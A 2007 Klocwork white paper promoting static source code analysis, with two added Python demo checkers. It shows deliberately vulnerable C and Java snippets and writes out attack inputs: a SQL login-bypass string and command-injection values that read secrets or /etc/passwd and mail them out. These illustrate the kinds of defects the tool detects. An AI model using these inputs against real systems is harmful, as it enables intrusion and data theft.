Page 1: Klocwork Paper Static Analysis When Why How

When, Why and How to Leverage Source Code Analysis Tools

Finding critical bugs in C, C++ and Java code

Automated source code analysis is technology aimed at locating and describing areas of weakness in source code. Those weaknesses might be security vulnerabilities, logic errors, implementation defects, concurrency violations, rare boundary conditions, or many other types of problem-causing code. The name of the associated research field is static analysis. This is differentiated from more traditional dynamic analysis techniques such as unit or penetration test by the fact that the work is performed at build time using only the source code of the program or module in question. The results reported are therefore generated from a complete view of every possible execution path, rather than some aspect of a necessarily limited observed runtime behavior.

Perhaps the most obvious question confronting any new developer-facing technology is: why?

»» Why should developers use a new tool when they already have so many to choose from?

»» What makes this technology compelling enough to make me want to add it to my already bloated build chain?

»» And what does it do, anyway?

This paper will answer these questions, and more. But for the moment just consider the fact that at time of writing, 80% of the Fortune 500 have already deployed, or are currently engaged in deploying, some kind of automated source code analysis. The reasons for doing so can be stated in as many ways as there are people answering the question, but the basic principle can be found in all of these deployments:

»» Tell me what's wrong with my code before I ship it – don't let me be the guy responsible for shipping a killer vulnerability or bug into the wild.

There are other compelling reasons, such as:

»» Make my existing processes for code review more effective through automation

»» Enhance my existing QA resource with 100% coverage of all boundary conditions

»» Help me protect my brand as we go to market with new products

But the bottom line remains the capability of this technology to afford developers the ability to scrub their code of obvious and not-so-obvious weaknesses as they work, before they submit their code for check-in and more formal down-stream validation procedures.

GWYN FISHER, CTO | WHITE PAPER | OCTOBER 2007

WWW.KLOCWORK.COM


When, Why and How to Leverage Source Code Analysis Tools | Klocwork White Paper | 2

Introduction to the Technology ____________________________________________________________________________________

The process of automated source code analysis involves building a rich representation or model of the provided code (akin to a compilation phase), and then simulating all possible execution paths through that model, mapping out the flow of logic on those paths coupled with how and where data objects are created, used and destroyed.

Once the projection of code paths and the mapping of data objects are available, we can look for anomalous conditions that either will or might potentially cause exploitable vulnerabilities, execution failure, or data corruption at runtime.

There are two major families of checking capability typical to this type of analysis: abstract syntax tree (AST) validation and code path analysis. The former case is most frequently applied to validation of the basic syntax and structure of code, whereas the latter is used for more complete types of analysis that depend on understanding the state of a program's data objects at any particular point on a code execution path.

Abstract Syntax Trees

An abstract syntax tree, or AST for short, is simply a tree-structured representation of the source code as might be typically generated by the preliminary parsing stages of a compiler. This tree contains a rich breakdown of the structure of the code in a non-ambiguous manner, allowing for simple searches to be performed for anomalous syntax.

Consider the example of an organization wishing to enforce a set of corporate coding standards. Stated in the standard is the basic requirement for the use of a compound statement block rather than single statements as the body of a loop (e.g. a for-loop). In this case, an AST check is what would be appropriate:

INCORRECT:

```c
for( i = 0; i < 10; i++ ) doSomething();
```

CORRECT:

```c
for( i = 0; i < 10; i++ ) { doSomething(); }
```

In this example, the (simplified, for clarity) AST for the incorrect case would conceptually appear as follows:

```text
For-loop
└── Statement
    └── doSomething()
```

In contrast to which, the AST for the correct case would conceptually appear as follows:

```text
For-loop
└── Statement block
    └── Statement
        └── doSomething()
```

As you can imagine, constructing checkers that look for this type of standards violation is quite straightforward and depends solely on the syntax of the code itself and not on the runtime behavior, or state, of that code. Essentially, the checker would be instructed to find all instances of "For-loop" nodes that contain a "Statement" node as an immediate descendant, and to flag them as violations.

Similarly, AST checkers can easily be constructed to enforce standards around naming conventions, function call restrictions (e.g. unsafe library checks), etc. Anything that can be inferred from the code without requiring knowledge of that code's runtime behavior is typically a target for AST checking.


Given the simple nature of what AST checkers can actually do, there are many tools that offer this type of checking for various different languages, some of which are freely available from the open source community, for example PMD for Java. Several of these tools use XPath, or an XPath-derived grammar to define the conditions that the checkers look for, and customers should consider adopting solutions that provide extensibility mechanisms for creating AST checkers. This type of checking is relatively simple to do, and constructing new checkers of this type for corporate coding standards or industry recommended best practice is a common endeavor.
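The two AST rules just described (loop body must be a block; restricted library calls), run over hand-built trees shaped like the diagrams above. This is an added illustration, not Klocwork's or PMD's code; the node shape, rule names and the banned-function list are assumptions for the demo.

```python
"""Two AST checkers of the kind the paper describes, run over hand-built
trees. Added illustration, not Klocwork's or PMD's code; the node shape
(kind, attributes, children) and the rule names are assumptions."""


def node(kind, *children, **attrs):
    """Build an AST node: a kind string, attributes, and an ordered child list."""
    return (kind, attrs, list(children))


def walk(tree):
    """Yield every node of the tree in pre-order (source order)."""
    stack = [tree]
    while stack:
        cur = stack.pop()
        yield cur
        stack.extend(reversed(cur[2]))


def loop_body_is_bare_statement(cur):
    """The paper's coding-standard rule: a For-loop whose immediate
    descendant is a Statement rather than a Statement block."""
    kind, _, children = cur
    return kind == "For-loop" and any(c[0] == "Statement" for c in children)


# Constructed list for the function-call restriction rule.
UNSAFE_CALLS = {"strcpy", "sprintf", "gets"}


def calls_unsafe_function(cur):
    """Function-call restriction rule: a Call node naming a banned function."""
    kind, attrs, _ = cur
    return kind == "Call" and attrs.get("name") in UNSAFE_CALLS


RULES = {
    "loop-body-needs-block": loop_body_is_bare_statement,
    "unsafe-library-call": calls_unsafe_function,
}


def run_ast_checks(tree):
    """Return (rule, line) for every node that violates a rule, in source order."""
    findings = []
    for cur in walk(tree):
        for name, rule in RULES.items():
            if rule(cur):
                findings.append((name, cur[1].get("line")))
    return findings


# The paper's INCORRECT case: for( i = 0; i < 10; i++ ) doSomething();
INCORRECT = node("For-loop",
                 node("Statement", node("Call", name="doSomething"), line=1),
                 line=1)

# The paper's CORRECT case: for( i = 0; i < 10; i++ ) { doSomething(); }
CORRECT = node("For-loop",
               node("Statement block",
                    node("Statement", node("Call", name="doSomething"), line=1)),
               line=1)

# A constructed function body exercising both rules.
BODY = node("Statement block",
            INCORRECT,
            node("Statement", node("Call", name="strcpy", line=2), line=2),
            CORRECT)

if __name__ == "__main__":
    for rule, line in run_ast_checks(BODY):
        print(f"line {line}: violates {rule}")
```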

Code Path Analysis

Consider now a more complex example. This time instead of looking for style violations, we wish to check whether an attempted dereference of a pointer should be expected to succeed or fail:

```c
if( x & 1 ) ptr = NULL;
*ptr = 1;
```

In this case it is obvious from manual inspection that the variable "ptr" can assume a NULL value whenever the variable "x" is odd, and that this condition will cause an unavoidable zero-page dereference.

Attempting to find a bug of this type using AST scanning, however, is seriously non-trivial. Consider the (simplified, for clarity) AST that would be created from that snippet of code:

```text
Statement Block
├── If-statement
│   ├── Check-Expression
│   │   └── Binary-operator &
│   │       ├── x
│   │       └── 1
│   └── True-Branch
│       └── Expression-statement
│           └── Assignment-operator =
│               ├── ptr
│               └── 0
└── Expression-statement
    └── Assignment-operator =
        ├── Dereference-pointer
        │   └── ptr
        └── 1
```

In this case, there is no obvious tree search or simple node enumeration that could cover the attempted, and at least occasionally illegal, dereferencing of "ptr" in anything like a reasonably generalized form. So for cases such as this, it is necessary to take a step beyond simply searching for patterns of syntax, and to analyze the lifecycle of data objects as they appear and are used within a control path's flow of execution.

Code path analysis tracks objects within a code execution path and allows checkers to validate the legality or cleanliness of the data as it gets used. In the example above, the AST that is built for simple types of style and syntax checks is rewritten in a form that allows an answer to be generated for the following question:

»» Is there a valid, reachable code path on which the assignment of NULL is followed by an attempted dereference without an intermediate check?


Consider the following example of control flow and data object usage:

```c
void f(int x, int y)
{
    int value, *p, *q;
    p = (x & 1) ? NULL : &value;
    if( p ) *p = 1;
    q = p;
    if( y & 1 ) *q = 1;
}
```

In this instance we will unavoidably crash whenever both 'x' and 'y' are odd. Finding this situation requires a rich representation that reflects the start, or trigger, of a given code path, any propagation or aliasing that occurs during the execution of that code path, and the end, or sink, of the code path.

In our example, the trigger for the code path that interests us is the assignment of a NULL value to a pointer:

```c
p = (x & 1) ? NULL : &value;
```

Once this assignment is made, we can reasonably begin looking along the ensuing reachable code paths to check for propagation and/or illegal sink conditions. In our example, the first potential sink occurs using the variable 'p':

```c
if( p ) *p = 1;
```

As the value of the pointer is checked for legality, however, this isn't an illegal sink condition and so can be ignored. Next, we have propagation:

```c
q = p;
```

From this point forwards in the reachable code path set, references to 'q' are as valid as references to 'p', as they are now aliases of each other (until otherwise assigned). Knowing this, the system can again validate a potential sink:

```c
if( y & 1 ) *q = 1;
```

In this case, it is entirely possible to follow a legal code path all the way from the assignment of NULL through to the use of that NULL in a crash-causing context, and so a path analysis defect will be reported.

Obviously this is only one type of the many different questions that can be answered using this type of analysis, such as:

»» Is this newly created object released before all aliases to it are removed from scope?

»» Is this data object ever range-checked before being passed to an OS function?

»» Is this string ever checked for special characters before being submitted as a SQL query?

»» Will this copy operation result in a buffer overflow?

»» Is it safe to call this function at this time?

By following code execution paths, either forward from a trigger event towards a target scenario, or backwards from a trigger event towards a required initialization, we can determine the answers to these questions and provide error reports when the target scenario or initialization either does or does not occur as expected.

This type of capability is required to do sophisticated analysis of source code and customers should look for tools that provide comprehensive code path analysis to enable the location of flaws such as memory leaks, invalid pointer dereferences, unsafe or tainted data propagation, concurrency violations, and many other types of problem-causing conditions as described in the next section.
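The trigger / propagation / sink walk described above, carried out by a toy path-sensitive checker over the paper's `f(int x, int y)` and its two-line `ptr` example. This is an added illustration, not Klocwork's code; the tuple mini-IR, the statement names and the repaired variant `FIXED_F` are assumptions.

```python
"""Toy path-sensitive NULL-dereference checker following the paper's
trigger / propagation / sink recipe. Added illustration, not Klocwork's
code; the statement tuples are an assumed mini-IR for C fragments:

  ("null", v)               v = NULL           trigger
  ("addr", v)               v = &something     never NULL
  ("alias", dst, src)       dst = src          propagation
  ("branch", taken, other)  if( unknown )      both arms feasible
  ("if_nonnull", v, body)   if( v ) { body }   the intermediate check
  ("deref", v)              *v = ...           sink
"""
from itertools import count

NULL, NONNULL, UNKNOWN = "NULL", "non-NULL", "unknown"


def _walk(stmts, classes, values, trace, ids, defects):
    """Enumerate every feasible path through stmts, recording NULL sinks.

    classes maps a variable to an alias-class id and values maps a class id
    to its abstract value, so checking q also refines p when q aliases p.
    """
    for idx, stmt in enumerate(stmts):
        kind, rest = stmt[0], stmt[1:]
        if kind in ("null", "addr"):
            v = rest[0]
            classes[v] = cid = next(ids)      # reassignment breaks old aliases
            values[cid] = NULL if kind == "null" else NONNULL
            trace.append(f"{v} = {'NULL' if kind == 'null' else '&...'}")
        elif kind == "alias":
            dst, src = rest
            classes[dst] = classes.setdefault(src, next(ids))
            values.setdefault(classes[dst], UNKNOWN)
            trace.append(f"{dst} = {src}")
        elif kind == "deref":
            v = rest[0]
            cid = classes.setdefault(v, next(ids))
            if values.setdefault(cid, UNKNOWN) == NULL:
                defects.append((v, trace + [f"*{v} dereferenced"]))
                return                        # this path has crashed
            trace.append(f"*{v} used ({values[cid]})")
        elif kind in ("branch", "if_nonnull"):
            tail = stmts[idx + 1:]
            if kind == "branch":
                forks = [(rest[0], None, "cond true"), (rest[1], None, "cond false")]
            else:
                v, body = rest
                forks = [(body, (v, NONNULL), f"{v} != NULL"),
                         ([], (v, NULL), f"{v} == NULL")]
            for body, refine, label in forks:
                c2, v2 = dict(classes), dict(values)   # fork the state
                if refine:
                    var, val = refine
                    cid = c2.setdefault(var, next(ids))
                    cur = v2.setdefault(cid, UNKNOWN)
                    if cur not in (UNKNOWN, val):
                        continue              # arm infeasible on this path
                    v2[cid] = val
                _walk(list(body) + tail, c2, v2, trace + [label], ids, defects)
            return                            # the forks consumed the tail
        else:
            raise ValueError(f"unknown statement {stmt!r}")


def find_null_derefs(program):
    """Return [(variable, path)] for every feasible path that dereferences NULL."""
    defects = []
    _walk(list(program), {}, {}, [], count(), defects)
    return defects


# The paper's f(int x, int y), one IR statement per C line.
PAPER_F = [
    ("branch", [("null", "p")], [("addr", "p")]),  # p = (x & 1) ? NULL : &value;
    ("if_nonnull", "p", [("deref", "p")]),          # if( p ) *p = 1;
    ("alias", "q", "p"),                            # q = p;
    ("branch", [("deref", "q")], []),               # if( y & 1 ) *q = 1;
]
# The paper's two-line example: if( x & 1 ) ptr = NULL; *ptr = 1;
PAPER_IF = [("branch", [("null", "ptr")], []), ("deref", "ptr")]
# A repaired f (assumed): guarding the second sink through the alias q.
FIXED_F = PAPER_F[:3] + [("branch", [("if_nonnull", "q", [("deref", "q")])], [])]

if __name__ == "__main__":
    for name, prog in (("f", PAPER_F), ("ptr", PAPER_IF), ("fixed f", FIXED_F)):
        for var, path in find_null_derefs(prog):
            print(f"{name}: NULL dereference of {var} via " + " -> ".join(path))
```

The reported path for `f` is exactly the one the text walks through: NULL assigned, the `if( p )` check not taken, `q` aliased to `p`, then `*q` on the odd-`y` arm.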


What Type of Issues Can Be Found? __________________________________________________________________________

In this section, we will walk through a number of examples of problems that can be identified using modern static analysis tools, showing how they occur and what can happen if they are not remedied before shipment. Whilst many more types of weakness can be found using Klocwork's tools, these examples should give the reader a firm grounding in what a good static analysis suite can do, regardless of the vendor.

Note that the examples given here are shown in a variety of C/C++ and Java. Where appropriate, the relevant capabilities within the product are available in all supported languages, however.

Security vulnerabilities

Traditionally of interest to developers working on consumer-facing applications, security is becoming more and more critical to developers in all types of environments, even those that have until recently considered security to be a non-issue. Some of the more important areas of security that can be found with source code analysis are:

»» Denial of service

»» SQL injection

»» Buffer overflow

»» Cross-site scripting (XSS)

»» Process/file injection

Denial of service

As could be guessed from the name, this type of vulnerability reflects a desire on the part of an attacker to deny access to a service offered by one or more processes under attack. This can be caused many different ways, from actually crashing the process, to choking the service with an inordinate number of requests, to resource constraining the service to the point of it becoming useless, etc. Attack vectors that are exposed to such approaches can often be spotted in code that is not created to be defensive, but rather makes naïve assumptions about the operating environment within which it will be running.

Consider the following example:

```java
public void f(String name, Properties props) throws IOException
{
    InputStream is;
    is = getClass().getClassLoader().getResourceAsStream(name);
    if( is != null ) {
        props.load(is);
    }
}
```

This simple function can easily cause a resource constraint within a server that will eventually lead to a DoS condition. Every time this function is called a new instance of the named properties collection will be created and will not be closed. Call this function within the main request handler of a service and it won't take long for the service to crawl to a halt.

Likewise, creating resources using data that has not been validated (a practice known as taint propagation) can quickly choke a service:

```java
public void doGet(HttpServletRequest req, HttpServletResponse res)
{
    String val = req.getParameter("size");
    Map props = new HashMap(Integer.parseInt(val));
    …
}
```


Here the tainted data, as retrieved from an incoming HTTP parameter, is passed without validation into the constructor for a Collection object, an operation that can easily be attacked to cause the service to shut down.

Note that while this example uses a Java web servlet request for demonstration purposes, many DoS attack vectors exist within process boundary conditions that are normally entirely within the control of the developer writing the application. This tends to lead to assumptions being made about the data that will be marshaled across that boundary, allowing an attacker to disrupt service simply by placing unexpected ranges of data on what is supposed to be a clean wire, as shown in this example:

```c
void readDataFromWire(unsigned char* stream)
{
    int bytes = (int)(*stream++);
    unsigned char* buffer = (unsigned char*)malloc(bytes);
    …
}
```

Without checking the value of the 'bytes' variable, there is no way to guarantee that the subsequent allocation won't cause a failure, or potentially worse a significant constraint on available memory for other parts of the process, to occur.

SQL Injection

SQL-based attacks focus on sloppily-constructed queries that can result in the attacker being able to completely compromise the underlying database security model. Consider the following example of a login validation query:

```sql
SELECT ID FROM USERS WHERE NAME='user' AND PWD='password';
```

Incoming parameters from the user are substituted into the expression and the query is executed. Consider a set of parameters provided by an attacker:

```text
NAME: x
PWD:  x' OR '1' = '1
```

That bizarre-looking password, if not appropriately filtered by the application, results in the login validation query performing a retrieval of every ID in the system:

```sql
SELECT ID FROM USERS WHERE NAME='x' AND PWD='x' OR '1' = '1';
```

If this is compounded by the login simply checking for success or failure of this statement (as opposed to counting result rows), the attacker is quickly granted whatever access rights might be available from whatever user records are processed by the application. In applications where the first row of the user table is reserved for the super-user, the application could easily be completely compromised.

There are many other forms of attack possible using applications that are not careful in their treatment of substitution strings within database statements. Luckily, a large percentage of the mistakes most commonly made in preparing such statements can be found by checking strings that are being provided to database functions for taint, or the lack thereof. For example:

```java
public void query(HttpServletRequest req, Connection conn) throws Exception
{
    Statement stmt = conn.createStatement();
    String val = req.getParameter("User");
    stmt.executeQuery("select * from users where user='" + val + "';");
}
```

In this example, the tainted input value "val" was retrieved from the incoming request and substituted into a database statement without first having been scrubbed for characters outside of the alphanumeric range. Any such usage is subject to attack, and will cause warnings to be generated by the tool.

Buffer overflow

Buffers or arrays that are improperly handled can potentially lead to process corruption and even the execution of arbitrary code injected by an attacker. Consider the following example:

```c
void f(unsigned char* stream)
{
    unsigned char buf[32];
    memcpy(buf, stream + 1, *stream);
    …
}
```

In this trivial case, the author has made a fundamental assumption about the cleanliness of the incoming data, coupled with an architectural assumption about the range of that data. If this function is used in an environment open to attack, for example to process marshaled data from another process or server, or even from a file that is subject to injection on the user's system, the attacker could cause considerable stack corruption simply by exploiting the fact that the code will happily copy up to 255 bytes into a buffer able to hold only 32. A particularly accomplished attacker could use this exploit to inject carefully crafted code that effectively hijacks the process by inserting dummy stack content and overwriting one or more call frames.

A recent, high profile security breach in Microsoft Windows was caused by exactly this scenario. The "animated cursor vulnerability" as it was known was caused by a section of code that effectively performed the following operations:

```c
HICON LoadAniIcon(…)
{
    …
    ANIHEADER myAniHeader;
    memcpy(&myAniHeader, untrustedData->data, untrustedData->length);
    …
}
```

Given sufficient time, motivation and resource, attackers were able to completely compromise target systems simply by encouraging users to load and use carefully crafted animated cursor files. Those cursor files contained structures guaranteed to cause this operation to overflow available space, to therefore corrupt the stack, and to place on the resulting stack a frame intended to transfer control to functions open to compromise.

Cross-site scripting (XSS)

One of the first restrictions placed on JavaScript in early browser versions was to build a wall around page content so that scripts executing within a frame served by one site could not access content of frames served by another site. Cross-site scripting, therefore, is an attack pattern that focuses on enabling script from one site (the attacker's site) to access content from another site (e.g. the user's bank account site). In order to do this, the user must typically visit either a malicious or a naïve web site, obviously, although many experiments in social engineering have shown that users can be funneled towards even the most outlandish of sites quite readily.

In terms of physical manifestation, the most common form of XSS requires unfiltered HTML to be reflected back to the user from a server request. One common early attack vector was search engine result pages, which typically reflected the user's query term in the title of the page. Without filtering, this reflected query term could easily contain HTML tags that were not correctly encoded and will therefore be interpreted as valid HTML by the receiving browser.

In essence, any reflection of unfiltered incoming data will trigger a warning from the tool, as the number and variety of exploits resulting from XSS grows every day. For example:

```java
public void doGet(HttpServletRequest req, HttpServletResponse res)
{
    String title = req.getParameter("searchTerm");
    res.getOutputStream().write(title.getBytes("UTF-8"));
}
```

Other manifestations of XSS revolve around the persistent storage of unfiltered user input that is later used to provide response content. This is a more difficult type of XSS to diagnose, as the attack pattern depends not only on a user's unfiltered input being stored, but on that stored tainted data being made available to every user from that point onwards. Naïve forum software packages were particularly susceptible to this attack pattern in the early days of the web, but in essence any application that stores incoming unfiltered web data in a database (or file) and then reflects that stored data back to the user at a later date is vulnerable to this persistent form of XSS. Due to this attack pattern being so destructive if exploited, the tool triggers a warning whenever unfiltered data is retrieved from persistent storage and forwarded to the user.

Process or file injection

Of particular value to attackers, and therefore particularly to be avoided by authors, are attack vectors that allow the modification of system commands and/or system files. Performing process creation using tainted input, or creating files using tainted names or locations are the most prevalent mistakes made.

Consider the following:

```c
void doListing(char* name)
{
    char command[256];
    if( strlen(name) < 250 ) {
        sprintf(command, "ls %s", name);
        system(command);
    }
}
```

In this example the author has left themselves open to malicious attack by not scrubbing the incoming file name before appending it to an innocuous-looking command. Consider input that gets appended by this function without further processing to the "ls" command such as:

```text
-R / | grep secret | mail [email protected]
```

or

```text
/dev/null | cat /etc/passwd | awk -F: '{print $1}' | mail [email protected]
```

In general, any exit point to the underlying OS that uses either a command or file name must be validated for special characters prior to the call being placed. Failure to do so may well result in catastrophic results for the operating environment.


Another example shows a file-specific attack vector:

```java
public void doPost(HttpServletRequest req, HttpServletResponse resp)
{
    String loc = req.getParameter("name");
    unpackFilesTo(loc, req.getInputStream());
}

private void unpackFilesTo(String loc, InputStream data)
{
    File dir = new File("./unpacked/", loc);
    …
}
```

In this example, a potentially tainted string is used to construct a relative path name. Unfortunately for the author, the File constructor used here places no restriction on the use of "../" being a path element, thus leaving this application wide open to arbitrary file creation and/or overwrite.

Implementation defects

Regardless of the application being developed, implementation defects that escape into the wild have significant impact on the product being deployed. This could range from increased support costs to ongoing brand criticism to bottom line impact from inventory reversal. Releasing a quality product is everybody's goal, and static analysis tools can help significantly in bringing that product to market. Some of the more important areas of quality and ongoing maintenance are:

»» Memory management; leaks, using released memory, etc.

»» NULL pointer dereference/exception

»» Array bounds violations

»» Concurrency flaws and deadlocks

Memory management mistakes

Memory allocation and the correct releasing of that memory is a major source of defects, particularly in C and C++ code. Static analysis is well applied in this area, due to comprehensive coverage of code paths that can result in rare boundary conditions being signaled that might never be found using traditional runtime profiling tools.

Comprehensive static analysis tools should be able to track allocations and aliases of allocated memory to ensure that all allocations are released, that code paths do not attempt to make use of released memory, and that memory objects are not released twice. For example:

```c
void f(…)
{
    char* p = (char*)malloc(32);
    char* q = p;
    /* Use of unchecked allocation, might well be NULL */
    strcpy(p, "hello world");
    /* Release the memory by freeing an alias */
    free(q);
    /* Attempted use of already released memory */
    strcpy(p, "not good");
    free(p);
}
```


NULL pointer dereference

Defects involving NULL pointers are as old as programming itself, and still as prevalent today as in any time before. We all understand what NULL pointers can do, and we all spend time looking for them and dealing with the after-effects of their being found in the wild. But consider the following example coding pattern that is fairly prevalent in even well-known and modern code bases:

```c
void f(char* ptr)
{
    if( *ptr && ptr )
        …
}
```

Or perhaps a Java example – just because there aren't pointers in the language doesn't mean you can't dereference a NULL object reference:

```java
public void f(String str)
{
    if( str.length() == 0 || str == null )
        return;
    …
}
```

Functions that return NULL under aberrant conditions, and whose returned values are later de-referenced, are particularly difficult to diagnose. If the static analyzer is able to consider every potential code path, however unlikely, even these rare boundary conditions are found and reported.

Array bounds violations

Accessing arrays out of bounds is an incredibly common mistake, even by senior developers. Consider the following example from code written by a vendor in support of their device under Linux (details obscured):

```c
int f()
{
    struct devinfo* dev[8];
    int i;
    get_device_info(dev, 8);
    for( i = 0; dev[i] && (i < 8); i++ ) {
        …
    }
}
```

In many instances, perhaps the majority of the time, this code will run without hiccup. But eventually it is guaranteed to cause a bus fault or page violation based on the index check being performed after that index is used to access the 'dev' array.

Concurrency violations

With the trend towards more and more multi-core designs at the chip level, developers are increasingly being called upon to create threaded, or at least thread-aware, software. This places additional burden in terms of understanding how certain OS calls interact with locks that can cause threads to hang, and potentially to deadlock two or more threads in a process.

Only a handful of tools, such as the ones provided by Klocwork, are able to apply validations in the area of concurrency, such as ensuring that threads holding locks do not attempt to suspend or halt themselves, that locks are correctly released, and that lock holders do not attempt real-time pausing activities.


For example:

```c
pthread_mutex_t lock;

void f()
{
    pthread_mutex_lock(&lock);
    sleep(30000);
    pthread_mutex_unlock(&lock);
}
```

In this pathological example, all threads requiring access to the "lock" mutex would be deadlocked for 30s waiting for this segment to unlock.

Worse yet, the following example shows a never-released lock:

```c
void f()
{
    pthread_mutex_lock(&lock);
    switch( op() ) {
    case 0:
        return;
    default:
        break;
    }
    pthread_mutex_unlock(&lock);
}
```

In the case where the function "op" returns zero, the calling thread will maintain the mutex on return. Assuming this lock is being used for task scheduling or other typical server activities, the obvious result is a hung system.

Another aspect of concurrency is concurrent modification of data objects. The following example shows a Java Collection operation that will be flagged as illegal:

```java
public void f(Collection coll)
{
    for( Iterator it = coll.iterator(); it.hasNext(); ) {
        String el = (String)it.next();
        if( el.startsWith("/") )
            coll.remove(el);
    }
}
```

In fact, this operation is illegal even in a single threaded environment as it violates a basic contract within the Collections framework, but in a multi-threaded environment the likelihood of this causing a data corrupting problem within the Collection itself is vastly increased.

Summary __________________________________________________________________________________________________________________

As a developer considering using automated source code analysis, or a development manager considering providing such analysis tools for a group of coders, it should be obvious from the previous sections of this document what kind of problems can be found and how this might apply in day-to-day situations. In addition to what is described here, more types of problems can be found by Klocwork's tools, ranging from additional types of security or quality defects, to locating dead code, to incomplete or redundant header inclusion, to architectural coherence, to metrics violations, and many others.

One of the key aspects of any development tool is how it works for the developer, and by providing IDE integration with the most commonly used environments (Visual Studio, Eclipse, IDEA, Wind River Workbench, QNX Momentics, etc.) as well as robust command line tools for more traditional development environments, Klocwork is all about supporting developers in their native habitat.

Who wants to be the person on the hot seat when a critical vulnerability is exploited in the field, or when a coding mistake causes an inventory turnaround and costs your company serious money? Avoid that exposure by performing the most rigorous form of automated code review possible today, and do it on your desktop at the same time as you build your code.

Klocwork your source code and feel confident that you're checking in the most secure and defect-free code you've ever created.

About the Author _______________________________________________________________________________________________________

Gwyn Fisher is the CTO of Klocwork and is responsible for guiding the company's technical direction and strategy. With nearly 20 years of global technology experience, Gwyn brings a valuable combination of vision, experience, and direct insight into the developer perspective. With a background in formal grammars and computational linguistics, Gwyn has spent much of his career working in the search and natural language domains, holding senior executive positions with companies like Hummingbird, Fulcrum Technologies, PC DOCS and LumaPath. At Klocwork, Gwyn has returned to his original passion, compiler theory, and is leveraging his experience and knowledge of the developer mindset to move the practical domain of static analysis to the next level.

About Klocwork _________________________________________________________________________________________________________

Klocwork® offers a portfolio of software development productivity tools designed to ensure the security, quality and maintainability of complex code bases. Using proven static analysis technology, Klocwork's tools identify critical security vulnerabilities and quality defects, optimize peer code review, and help developers create more maintainable code. Klocwork's tools are an integral part of the development process for over 850 customers in the consumer electronics, mobile devices, medical technologies, telecom, military and aerospace sectors.

IN THE UNITED STATES: 15 New England Executive Park, Burlington, MA 01803

IN CANADA: 30 Edgewater Street, Suite 114, Ottawa, ON K2L 1V8

t: 1.866.556.2967 | f: 613.836.9088 | www.klocwork.com

© Copyright Klocwork Inc. 2010 · All Rights Reserved

